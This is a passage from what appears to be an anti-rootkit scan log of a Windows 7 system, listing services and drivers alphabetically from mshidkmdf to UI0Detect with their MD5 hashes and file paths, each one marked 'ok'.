23:35:43.0280 5440  [ 3E1E5767043C5AF9367F0056295E9F84 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
23:35:43.0295 5440  mshidkmdf - ok
23:35:43.0311 5440  [ 0A4E5757AE09FA9622E3158CC1AEF114 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
23:35:43.0311 5440  msisadrv - ok
23:35:43.0326 5440  [ 90F7D9E6B6F27E1A707D4A297F077828 ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
23:35:43.0342 5440  MSiSCSI - ok
23:35:43.0342 5440  msiserver - ok
23:35:43.0358 5440  [ 8C0860D6366AAFFB6C5BB9DF9448E631 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
23:35:43.0373 5440  MSKSSRV - ok
23:35:43.0373 5440  [ 3EA8B949F963562CEDBB549EAC0C11CE ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
23:35:43.0404 5440  MSPCLOCK - ok
23:35:43.0404 5440  [ F456E973590D663B1073E9C463B40932 ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
23:35:43.0436 5440  MSPQM - ok
23:35:43.0436 5440  [ 0E008FC4819D238C51D7C93E7B41E560 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
23:35:43.0451 5440  MsRPC - ok
23:35:43.0451 5440  [ FC6B9FF600CC585EA38B12589BD4E246 ] mssmbios        C:\Windows\system32\drivers\mssmbios.sys
23:35:43.0467 5440  mssmbios - ok
23:35:43.0467 5440  [ B42C6B921F61A6E55159B8BE6CD54A36 ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
23:35:43.0498 5440  MSTEE - ok
23:35:43.0498 5440  [ 33599130F44E1F34631CEA241DE8AC84 ] MTConfig        C:\Windows\system32\DRIVERS\MTConfig.sys
23:35:43.0514 5440  MTConfig - ok
23:35:43.0514 5440  [ 159FAD02F64E6381758C990F753BCC80 ] Mup             C:\Windows\system32\Drivers\mup.sys
23:35:43.0529 5440  Mup - ok
23:35:43.0529 5440  [ 61D57A5D7C6D9AFE10E77DAE6E1B445E ] napagent        C:\Windows\system32\qagentRT.dll
23:35:43.0560 5440  napagent - ok
23:35:43.0576 5440  [ 26384429FCD85D83746F63E798AB1480 ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
23:35:43.0592 5440  NativeWifiP - ok
23:35:43.0592 5440  [ 8C9C922D71F1CD4DEF73F186416B7896 ] NDIS            C:\Windows\system32\drivers\ndis.sys
23:35:43.0623 5440  NDIS - ok
23:35:43.0623 5440  [ 0E1787AA6C9191D3D319E8BAFE86F80C ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
23:35:43.0654 5440  NdisCap - ok
23:35:43.0654 5440  [ E4A8AEC125A2E43A9E32AFEEA7C9C888 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
23:35:43.0670 5440  NdisTapi - ok
23:35:43.0685 5440  [ D8A65DAFB3EB41CBB622745676FCD072 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
23:35:43.0701 5440  Ndisuio - ok
23:35:43.0716 5440  [ 38FBE267E7E6983311179230FACB1017 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
23:35:43.0732 5440  NdisWan - ok
23:35:43.0732 5440  [ A4BDC541E69674FBFF1A8FF00BE913F2 ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
23:35:43.0763 5440  NDProxy - ok
23:35:43.0763 5440  [ 80B275B1CE3B0E79909DB7B39AF74D51 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
23:35:43.0794 5440  NetBIOS - ok
23:35:43.0794 5440  [ 280122DDCF04B378EDD1AD54D71C1E54 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
23:35:43.0826 5440  NetBT - ok
23:35:43.0826 5440  [ 81951F51E318AECC2D68559E47485CC4 ] Netlogon        C:\Windows\system32\lsass.exe
23:35:43.0841 5440  Netlogon - ok
23:35:43.0841 5440  [ 7CCCFCA7510684768DA22092D1FA4DB2 ] Netman          C:\Windows\System32\netman.dll
23:35:43.0872 5440  Netman - ok
23:35:43.0888 5440  [ D22CD77D4F0D63D1169BB35911BFF12D ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
23:35:43.0888 5440  NetMsmqActivator - ok
23:35:43.0888 5440  [ D22CD77D4F0D63D1169BB35911BFF12D ] NetPipeActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
23:35:43.0904 5440  NetPipeActivator - ok
23:35:43.0904 5440  [ 8C338238C16777A802D6A9211EB2BA50 ] netprofm        C:\Windows\System32\netprofm.dll
23:35:43.0935 5440  netprofm - ok
23:35:43.0950 5440  [ D22CD77D4F0D63D1169BB35911BFF12D ] NetTcpActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
23:35:43.0950 5440  NetTcpActivator - ok
23:35:43.0966 5440  [ D22CD77D4F0D63D1169BB35911BFF12D ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
23:35:43.0966 5440  NetTcpPortSharing - ok
23:35:43.0966 5440  [ 1D85C4B390B0EE09C7A46B91EFB2C097 ] nfrd960         C:\Windows\system32\DRIVERS\nfrd960.sys
23:35:43.0982 5440  nfrd960 - ok
23:35:43.0982 5440  [ 374071043F9E4231EE43BE2BB48DD36D ] NlaSvc          C:\Windows\System32\nlasvc.dll
23:35:43.0997 5440  NlaSvc - ok
23:35:44.0013 5440  [ 60EF6771E349EB9173142AB34AFC5A4C ] nlsX86cc        C:\Windows\system32\NLSSRV32.EXE
23:35:44.0013 5440  nlsX86cc - ok
23:35:44.0028 5440  [ 1DB262A9F8C087E8153D89BEF3D2235F ] Npfs            C:\Windows\system32\drivers\Npfs.sys
23:35:44.0044 5440  Npfs - ok
23:35:44.0044 5440  [ BA387E955E890C8A88306D9B8D06BF17 ] nsi             C:\Windows\system32\nsisvc.dll
23:35:44.0075 5440  nsi - ok
23:35:44.0075 5440  [ E9A0A4D07E53D8FEA2BB8387A3293C58 ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
23:35:44.0106 5440  nsiproxy - ok
23:35:44.0122 5440  [ 0D87503986BB3DFED58E343FE39DDE13 ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
23:35:44.0153 5440  Ntfs - ok
23:35:44.0153 5440  [ F9756A98D69098DCA8945D62858A812C ] Null            C:\Windows\system32\drivers\Null.sys
23:35:44.0184 5440  Null - ok
23:35:44.0184 5440  [ B4F70FAC4EA61CF150823AA063A39FF9 ] NVHDA           C:\Windows\system32\drivers\nvhda32v.sys
23:35:44.0200 5440  NVHDA - ok
23:35:44.0309 5440  [ 1A1BEF2359AF8242A88FB411DAC0FFF9 ] nvlddmkm        C:\Windows\system32\DRIVERS\nvlddmkm.sys
23:35:44.0528 5440  nvlddmkm - ok
23:35:44.0590 5440  [ B3E25EE28883877076E0E1FF877D02E0 ] nvraid          C:\Windows\system32\drivers\nvraid.sys
23:35:44.0606 5440  nvraid - ok
23:35:44.0621 5440  [ 4380E59A170D88C4F1022EFF6719A8A4 ] nvstor          C:\Windows\system32\drivers\nvstor.sys
23:35:44.0637 5440  nvstor - ok
23:35:44.0637 5440  [ 9BF0A35D07183603737F92E4988D92AC ] nvsvc           C:\Windows\system32\nvvsvc.exe
23:35:44.0652 5440  nvsvc - ok
23:35:44.0652 5440  [ 5A0983915F02BAE73267CC2A041F717D ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
23:35:44.0668 5440  nv_agp - ok
23:35:44.0668 5440  [ 08A70A1F2CDDE9BB49B885CB817A66EB ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
23:35:44.0684 5440  ohci1394 - ok
23:35:44.0684 5440  [ 9D10F99A6712E28F8ACD5641E3A7EA6B ] ose             C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
23:35:44.0699 5440  ose - ok
23:35:44.0762 5440  [ 358A9CCA612C68EB2F07DDAD4CE1D8D7 ] osppsvc         C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
23:35:44.0871 5440  osppsvc - ok
23:35:44.0871 5440  [ 82A8521DDC60710C3D3D3E7325209BEC ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
23:35:44.0886 5440  p2pimsvc - ok
23:35:44.0902 5440  [ 59C3DDD501E39E006DAC31BF55150D91 ] p2psvc          C:\Windows\system32\p2psvc.dll
23:35:44.0918 5440  p2psvc - ok
23:35:44.0918 5440  [ 2EA877ED5DD9713C5AC74E8EA7348D14 ] Parport         C:\Windows\system32\DRIVERS\parport.sys
23:35:44.0933 5440  Parport - ok
23:35:44.0933 5440  [ 3F34A1B4C5F6475F320C275E63AFCE9B ] partmgr         C:\Windows\system32\drivers\partmgr.sys
23:35:44.0949 5440  partmgr - ok
23:35:44.0949 5440  [ EB0A59F29C19B86479D36B35983DAADC ] Parvdm          C:\Windows\system32\DRIVERS\parvdm.sys
23:35:44.0964 5440  Parvdm - ok
23:35:44.0964 5440  [ 358AB7956D3160000726574083DFC8A6 ] PcaSvc          C:\Windows\System32\pcasvc.dll
23:35:44.0980 5440  PcaSvc - ok
23:35:44.0996 5440  [ 673E55C3498EB970088E812EA820AA8F ] pci             C:\Windows\system32\drivers\pci.sys
23:35:45.0011 5440  pci - ok
23:35:45.0011 5440  [ AFE86F419014DB4E5593F69FFE26CE0A ] pciide          C:\Windows\system32\drivers\pciide.sys
23:35:45.0011 5440  pciide - ok
23:35:45.0027 5440  [ F396431B31693E71E8A80687EF523506 ] pcmcia          C:\Windows\system32\DRIVERS\pcmcia.sys
23:35:45.0042 5440  pcmcia - ok
23:35:45.0042 5440  [ 250F6B43D2B613172035C6747AEEB19F ] pcw             C:\Windows\system32\drivers\pcw.sys
23:35:45.0042 5440  pcw - ok
23:35:45.0058 5440  [ 9E0104BA49F4E6973749A02BF41344ED ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
23:35:45.0089 5440  PEAUTH - ok
23:35:45.0120 5440  [ 414BBA67A3DED1D28437EB66AEB8A720 ] pla             C:\Windows\system32\pla.dll
23:35:45.0167 5440  pla - ok
23:35:45.0183 5440  [ EC7BC28D207DA09E79B3E9FAF8B232CA ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
23:35:45.0198 5440  PlugPlay - ok
23:35:45.0198 5440  [ 63FF8572611249931EB16BB8EED6AFC8 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
23:35:45.0214 5440  PNRPAutoReg - ok
23:35:45.0214 5440  [ 82A8521DDC60710C3D3D3E7325209BEC ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
23:35:45.0230 5440  PNRPsvc - ok
23:35:45.0245 5440  [ 53946B69BA0836BD95B03759530C81EC ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
23:35:45.0261 5440  PolicyAgent - ok
23:35:45.0276 5440  [ F87D30E72E03D579A5199CCB3831D6EA ] Power           C:\Windows\system32\umpo.dll
23:35:45.0292 5440  Power - ok
23:35:45.0308 5440  [ 631E3E205AD6D86F2AED6A4A8E69F2DB ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
23:35:45.0339 5440  PptpMiniport - ok
23:35:45.0339 5440  [ 85B1E3A0C7585BC4AAE6899EC6FCF011 ] Processor       C:\Windows\system32\DRIVERS\processr.sys
23:35:45.0354 5440  Processor - ok
23:35:45.0354 5440  [ CADEFAC453040E370A1BDFF3973BE00D ] ProfSvc         C:\Windows\system32\profsvc.dll
23:35:45.0370 5440  ProfSvc - ok
23:35:45.0370 5440  [ 81951F51E318AECC2D68559E47485CC4 ] ProtectedStorage C:\Windows\system32\lsass.exe
23:35:45.0386 5440  ProtectedStorage - ok
23:35:45.0386 5440  [ 6270CCAE2A86DE6D146529FE55B3246A ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
23:35:45.0417 5440  Psched - ok
23:35:45.0432 5440  [ AB95ECF1F6659A60DDC166D8315B0751 ] ql2300          C:\Windows\system32\DRIVERS\ql2300.sys
23:35:45.0464 5440  ql2300 - ok
23:35:45.0479 5440  [ B4DD51DD25182244B86737DC51AF2270 ] ql40xx          C:\Windows\system32\DRIVERS\ql40xx.sys
23:35:45.0479 5440  ql40xx - ok
23:35:45.0495 5440  [ 31AC809E7707EB580B2BDB760390765A ] QWAVE           C:\Windows\system32\qwave.dll
23:35:45.0510 5440  QWAVE - ok
23:35:45.0510 5440  [ 584078CA1B95CA72DF2A27C336F9719D ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
23:35:45.0526 5440  QWAVEdrv - ok
23:35:45.0526 5440  [ 30A81B53C766D0133BB86D234E5556AB ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
23:35:45.0557 5440  RasAcd - ok
23:35:45.0557 5440  [ 57EC4AEF73660166074D8F7F31C0D4FD ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
23:35:45.0588 5440  RasAgileVpn - ok
23:35:45.0588 5440  [ A60F1839849C0C00739787FD5EC03F13 ] RasAuto         C:\Windows\System32\rasauto.dll
23:35:45.0620 5440  RasAuto - ok
23:35:45.0620 5440  [ D9F91EAFEC2815365CBE6D167E4E332A ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
23:35:45.0651 5440  Rasl2tp - ok
23:35:45.0651 5440  [ CB9E04DC05EACF5B9A36CA276D475006 ] RasMan          C:\Windows\System32\rasmans.dll
23:35:45.0682 5440  RasMan - ok
23:35:45.0682 5440  [ 0FE8B15916307A6AC12BFB6A63E45507 ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
23:35:45.0713 5440  RasPppoe - ok
23:35:45.0713 5440  [ 44101F495A83EA6401D886E7FD70096B ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
23:35:45.0744 5440  RasSstp - ok
23:35:45.0744 5440  [ D528BC58A489409BA40334EBF96A311B ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
23:35:45.0776 5440  rdbss - ok
23:35:45.0776 5440  [ 0D8F05481CB76E70E1DA06EE9F0DA9DF ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
23:35:45.0791 5440  rdpbus - ok
23:35:45.0791 5440  [ 23DAE03F29D253AE74C44F99E515F9A1 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
23:35:45.0822 5440  RDPCDD - ok
23:35:45.0822 5440  [ 5A53CA1598DD4156D44196D200C94B8A ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
23:35:45.0854 5440  RDPENCDD - ok
23:35:45.0854 5440  [ 44B0A53CD4F27D50ED461DAE0C0B4E1F ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
23:35:45.0869 5440  RDPREFMP - ok
23:35:45.0885 5440  [ F031683E6D1FEA157ABB2FF260B51E61 ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
23:35:45.0900 5440  RDPWD - ok
23:35:45.0900 5440  [ 518395321DC96FE2C9F0E96AC743B656 ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
23:35:45.0916 5440  rdyboost - ok
23:35:45.0916 5440  [ 7B5E1419717FAC363A31CC302895217A ] RemoteAccess    C:\Windows\System32\mprdim.dll
23:35:45.0947 5440  RemoteAccess - ok
23:35:45.0947 5440  [ CB9A8683F4EF2BF99E123D79950D7935 ] RemoteRegistry  C:\Windows\system32\regsvc.dll
23:35:45.0978 5440  RemoteRegistry - ok
23:35:45.0978 5440  [ E891F07815AF88075705EF6A248711F6 ] rimspci         C:\Windows\system32\DRIVERS\rimspe86.sys
23:35:45.0994 5440  rimspci - ok
23:35:45.0994 5440  [ 5312F15DBEB47D906DCA2E334DC4C97D ] risdpcie        C:\Windows\system32\DRIVERS\risdpe86.sys
23:35:46.0010 5440  risdpcie - ok
23:35:46.0010 5440  [ A59E65DA90CCE1EEF6379D0627301725 ] rixdpcie        C:\Windows\system32\DRIVERS\rixdpe86.sys
23:35:46.0025 5440  rixdpcie - ok
23:35:46.0025 5440  [ 78D072F35BC45D9E4E1B61895C152234 ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
23:35:46.0056 5440  RpcEptMapper - ok
23:35:46.0056 5440  [ 94D36C0E44677DD26981D2BFEEF2A29D ] RpcLocator      C:\Windows\system32\locator.exe
23:35:46.0072 5440  RpcLocator - ok
23:35:46.0072 5440  [ 7660F01D3B38ACA1747E397D21D790AF ] RpcSs           C:\Windows\system32\rpcss.dll
23:35:46.0103 5440  RpcSs - ok
23:35:46.0119 5440  [ 032B0D36AD92B582D869879F5AF5B928 ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
23:35:46.0134 5440  rspndr - ok
23:35:46.0150 5440  [ 5283B9A27FF230F2FF70D92451FF409A ] RTL8167         C:\Windows\system32\DRIVERS\Rt86win7.sys
23:35:46.0166 5440  RTL8167 - ok
23:35:46.0166 5440  [ 81951F51E318AECC2D68559E47485CC4 ] SamSs           C:\Windows\system32\lsass.exe
23:35:46.0181 5440  SamSs - ok
23:35:46.0181 5440  [ 05D860DA1040F111503AC416CCEF2BCA ] sbp2port        C:\Windows\system32\drivers\sbp2port.sys
23:35:46.0197 5440  sbp2port - ok
23:35:46.0197 5440  [ 8FC518FFE9519C2631D37515A68009C4 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
23:35:46.0228 5440  SCardSvr - ok
23:35:46.0228 5440  [ 0693B5EC673E34DC147E195779A4DCF6 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
23:35:46.0259 5440  scfilter - ok
23:35:46.0275 5440  [ A04BB13F8A72F8B6E8B4071723E4E336 ] Schedule        C:\Windows\system32\schedsvc.dll
23:35:46.0306 5440  Schedule - ok
23:35:46.0306 5440  [ 319C6B309773D063541D01DF8AC6F55F ] SCPolicySvc     C:\Windows\System32\certprop.dll
23:35:46.0337 5440  SCPolicySvc - ok
23:35:46.0337 5440  [ 0328BE1C7F1CBA23848179F8762E391C ] sdbus           C:\Windows\system32\drivers\sdbus.sys
23:35:46.0353 5440  sdbus - ok
23:35:46.0353 5440  [ 08236C4BCE5EDD0A0318A438AF28E0F7 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
23:35:46.0368 5440  SDRSVC - ok
23:35:46.0384 5440  [ 206387AB881E93A1A6EB89966C8651F1 ] SDScannerService C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
23:35:46.0415 5440  SDScannerService - ok
23:35:46.0431 5440  [ A529CFE32565C0B145578FFB2B32C9A5 ] SDUpdateService C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
23:35:46.0462 5440  SDUpdateService - ok
23:35:46.0478 5440  [ CB63BDB77BB86549FC3303C2F11EDC18 ] SDWSCService    C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
23:35:46.0478 5440  SDWSCService - ok
23:35:46.0493 5440  [ 90A3935D05B494A5A39D37E71F09A677 ] secdrv          C:\Windows\system32\drivers\secdrv.sys
23:35:46.0509 5440  secdrv - ok
23:35:46.0524 5440  [ A59B3A4442C52060CC7A85293AA3546F ] seclogon        C:\Windows\system32\seclogon.dll
23:35:46.0540 5440  seclogon - ok
23:35:46.0556 5440  [ DCB7FCDCC97F87360F75D77425B81737 ] SENS            C:\Windows\System32\sens.dll
23:35:46.0571 5440  SENS - ok
23:35:46.0587 5440  [ 50087FE1EE447009C9CC2997B90DE53F ] SensrSvc        C:\Windows\system32\sensrsvc.dll
23:35:46.0602 5440  SensrSvc - ok
23:35:46.0602 5440  [ 9AD8B8B515E3DF6ACD4212EF465DE2D1 ] Serenum         C:\Windows\system32\DRIVERS\serenum.sys
23:35:46.0618 5440  Serenum - ok
23:35:46.0618 5440  [ 5FB7FCEA0490D821F26F39CC5EA3D1E2 ] Serial          C:\Windows\system32\DRIVERS\serial.sys
23:35:46.0634 5440  Serial - ok
23:35:46.0634 5440  [ 79BFFB520327FF916A582DFEA17AA813 ] sermouse        C:\Windows\system32\DRIVERS\sermouse.sys
23:35:46.0649 5440  sermouse - ok
23:35:46.0649 5440  [ 4AE380F39A0032EAB7DD953030B26D28 ] SessionEnv      C:\Windows\system32\sessenv.dll
23:35:46.0680 5440  SessionEnv - ok
23:35:46.0680 5440  [ 9F976E1EB233DF46FCE808D9DEA3EB9C ] sffdisk         C:\Windows\system32\drivers\sffdisk.sys
23:35:46.0696 5440  sffdisk - ok
23:35:46.0696 5440  [ 932A68EE27833CFD57C1639D375F2731 ] sffp_mmc        C:\Windows\system32\drivers\sffp_mmc.sys
23:35:46.0712 5440  sffp_mmc - ok
23:35:46.0712 5440  [ 6D4CCAEDC018F1CF52866BBBAA235982 ] sffp_sd         C:\Windows\system32\drivers\sffp_sd.sys
23:35:46.0727 5440  sffp_sd - ok
23:35:46.0727 5440  [ DB96666CC8312EBC45032F30B007A547 ] sfloppy         C:\Windows\system32\DRIVERS\sfloppy.sys
23:35:46.0743 5440  sfloppy - ok
23:35:46.0743 5440  [ D1A079A0DE2EA524513B6930C24527A2 ] SharedAccess    C:\Windows\System32\ipnathlp.dll
23:35:46.0774 5440  SharedAccess - ok
23:35:46.0790 5440  [ 414DA952A35BF5D50192E28263B40577 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
23:35:46.0821 5440  ShellHWDetection - ok
23:35:46.0821 5440  [ 2565CAC0DC9FE0371BDCE60832582B2E ] sisagp          C:\Windows\system32\drivers\sisagp.sys
23:35:46.0836 5440  sisagp - ok
23:35:46.0836 5440  [ A9F0486851BECB6DDA1D89D381E71055 ] SiSRaid2        C:\Windows\system32\DRIVERS\SiSRaid2.sys
23:35:46.0852 5440  SiSRaid2 - ok
23:35:46.0852 5440  [ 3727097B55738E2F554972C3BE5BC1AA ] SiSRaid4        C:\Windows\system32\DRIVERS\sisraid4.sys
23:35:46.0868 5440  SiSRaid4 - ok
23:35:46.0868 5440  [ 3E21C083B8A01CB70BA1F09303010FCE ] Smb             C:\Windows\system32\DRIVERS\smb.sys
23:35:46.0899 5440  Smb - ok
23:35:46.0899 5440  [ 6A984831644ECA1A33FFEAE4126F4F37 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
23:35:46.0914 5440  SNMPTRAP - ok
23:35:46.0914 5440  [ 95CF1AE7527FB70F7816563CBC09D942 ] spldr           C:\Windows\system32\drivers\spldr.sys
23:35:46.0930 5440  spldr - ok
23:35:46.0930 5440  [ 9AEA093B8F9C37CF45538382CABA2475 ] Spooler         C:\Windows\System32\spoolsv.exe
23:35:46.0946 5440  Spooler - ok
23:35:46.0992 5440  [ CF87A1DE791347E75B98885214CED2B8 ] sppsvc          C:\Windows\system32\sppsvc.exe
23:35:47.0055 5440  sppsvc - ok
23:35:47.0055 5440  [ B0180B20B065D89232A78A40FE56EAA6 ] sppuinotify     C:\Windows\system32\sppuinotify.dll
23:35:47.0086 5440  sppuinotify - ok
23:35:47.0086 5440  [ E4C2764065D66EA1D2D3EBC28FE99C46 ] srv             C:\Windows\system32\DRIVERS\srv.sys
23:35:47.0102 5440  srv - ok
23:35:47.0117 5440  [ 03F0545BD8D4C77FA0AE1CEEDFCC71AB ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
23:35:47.0133 5440  srv2 - ok
23:35:47.0133 5440  [ BE6BD660CAA6F291AE06A718A4FA8ABC ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
23:35:47.0148 5440  srvnet - ok
23:35:47.0148 5440  [ 64E44ACD8C238FCBBB78F0BA4BDC4B05 ] ssadbus         C:\Windows\system32\DRIVERS\ssadbus.sys
23:35:47.0180 5440  ssadbus - ok
23:35:47.0180 5440  [ BB2C84A15C765DA89FD832B0E73F26CE ] ssadmdfl        C:\Windows\system32\DRIVERS\ssadmdfl.sys
23:35:47.0195 5440  ssadmdfl - ok
23:35:47.0195 5440  [ 6D0D132DDC6F43EDA00DCED6D8B1CA31 ] ssadmdm         C:\Windows\system32\DRIVERS\ssadmdm.sys
23:35:47.0211 5440  ssadmdm - ok
23:35:47.0211 5440  [ D887C9FD02AC9FA880F6E5027A43E118 ] SSDPSRV         C:\Windows\System32\ssdpsrv.dll
23:35:47.0242 5440  SSDPSRV - ok
23:35:47.0242 5440  [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv          C:\Windows\system32\DRIVERS\ssmdrv.sys
23:35:47.0258 5440  ssmdrv - ok
23:35:47.0258 5440  [ D318F23BE45D5E3A107469EB64815B50 ] SstpSvc         C:\Windows\system32\sstpsvc.dll
23:35:47.0289 5440  SstpSvc - ok
23:35:47.0289 5440  [ E3D493BFB7CD108EC50B2F560C96367C ] ssudmdm         C:\Windows\system32\DRIVERS\ssudmdm.sys
23:35:47.0304 5440  ssudmdm - ok
23:35:47.0304 5440  [ DB32D325C192B801DF274BFD12A7E72B ] stexstor        C:\Windows\system32\DRIVERS\stexstor.sys
23:35:47.0320 5440  stexstor - ok
23:35:47.0320 5440  [ E1FB3706030FB4578A0D72C2FC3689E4 ] StiSvc          C:\Windows\System32\wiaservc.dll
23:35:47.0351 5440  StiSvc - ok
23:35:47.0351 5440  [ E58C78A848ADD9610A4DB6D214AF5224 ] swenum          C:\Windows\system32\drivers\swenum.sys
23:35:47.0351 5440  swenum - ok
23:35:47.0367 5440  [ A28BD92DF340E57B024BA433165D34D7 ] swprv           C:\Windows\System32\swprv.dll
23:35:47.0398 5440  swprv - ok
23:35:47.0414 5440  [ 2185CC5BE9922562108CF87F42E4BBAF ] SynTP           C:\Windows\system32\DRIVERS\SynTP.sys
23:35:47.0445 5440  SynTP - ok
23:35:47.0460 5440  [ 36650D618CA34C9D357DFD3D89B2C56F ] SysMain         C:\Windows\system32\sysmain.dll
23:35:47.0492 5440  SysMain - ok
23:35:47.0507 5440  [ 763FECDC3D30C815FE72DD57936C6CD1 ] TabletInputService C:\Windows\System32\TabSvc.dll
23:35:47.0523 5440  TabletInputService - ok
23:35:47.0523 5440  [ 98A1E6BC9F766B0B0A5BF00AF847EF20 ] tap0901         C:\Windows\system32\DRIVERS\tap0901.sys
23:35:47.0538 5440  tap0901 - ok
23:35:47.0538 5440  [ 613BF4820361543956909043A265C6AC ] TapiSrv         C:\Windows\System32\tapisrv.dll
23:35:47.0570 5440  TapiSrv - ok
23:35:47.0570 5440  [ B799D9FDB26111737F58288D8DC172D9 ] TBS             C:\Windows\System32\tbssvc.dll
23:35:47.0601 5440  TBS - ok
23:35:47.0616 5440  [ 7C0507D2391AF5933600CBCED799F277 ] Tcpip           C:\Windows\system32\drivers\tcpip.sys
23:35:47.0648 5440  Tcpip - ok
23:35:47.0663 5440  [ 7C0507D2391AF5933600CBCED799F277 ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
23:35:47.0694 5440  TCPIP6 - ok
23:35:47.0710 5440  [ 3EEBD3BD93DA46A26E89893C7AB2FF3B ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
23:35:47.0710 5440  tcpipreg - ok
23:35:47.0726 5440  [ 1CB91B2BD8F6DD367DFC2EF26FD751B2 ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
23:35:47.0741 5440  TDPIPE - ok
23:35:47.0741 5440  [ 2C2C5AFE7EE4F620D69C23C0617651A8 ] TDTCP           C:\Windows\system32\drivers\tdtcp.sys
23:35:47.0757 5440  TDTCP - ok
23:35:47.0757 5440  [ B459575348C20E8121D6039DA063C704 ] tdx             C:\Windows\system32\DRIVERS\tdx.sys
23:35:47.0772 5440  tdx - ok
23:35:47.0788 5440  [ 04DBF4B01EA4BF25A9A3E84AFFAC9B20 ] TermDD          C:\Windows\system32\drivers\termdd.sys
23:35:47.0788 5440  TermDD - ok
23:35:47.0804 5440  [ 382C804C92811BE57829D8E550A900E2 ] TermService     C:\Windows\System32\termsrv.dll
23:35:47.0835 5440  TermService - ok
23:35:47.0835 5440  [ 42FB6AFD6B79D9FE07381609172E7CA4 ] Themes          C:\Windows\system32\themeservice.dll
23:35:47.0850 5440  Themes - ok
23:35:47.0850 5440  [ 146B6F43A673379A3C670E86D89BE5EA ] THREADORDER     C:\Windows\system32\mmcss.dll
23:35:47.0882 5440  THREADORDER - ok
23:35:47.0882 5440  [ 4792C0378DB99A9BC2AE2DE6CFFF0C3A ] TrkWks          C:\Windows\System32\trkwks.dll
23:35:47.0913 5440  TrkWks - ok
23:35:47.0913 5440  [ 2C49B175AEE1D4364B91B531417FE583 ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
23:35:47.0944 5440  TrustedInstaller - ok
23:35:47.0944 5440  [ 254BB140EEE3C59D6114C1A86B636877 ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
23:35:47.0975 5440  tssecsrv - ok
23:35:47.0975 5440  [ FD1D6C73E6333BE727CBCC6054247654 ] TsUsbFlt        C:\Windows\system32\drivers\tsusbflt.sys
23:35:47.0991 5440  TsUsbFlt - ok
23:35:47.0991 5440  [ B2FA25D9B17A68BB93D58B0556E8C90D ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
23:35:48.0022 5440  tunnel - ok
23:35:48.0022 5440  [ 750FBCB269F4D7DD2E420C56B795DB6D ] uagp35          C:\Windows\system32\DRIVERS\uagp35.sys
23:35:48.0038 5440  uagp35 - ok
23:35:48.0038 5440  [ EE43346C7E4B5E63E54F927BABBB32FF ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
23:35:48.0069 5440  udfs - ok
23:35:48.0069 5440  [ 8344FD4FCE927880AA1AA7681D4927E5 ] UI0Detect       C:\Windows\system32\UI0Detect.exe
23:35:48.0084 5440  UI0Detect - ok
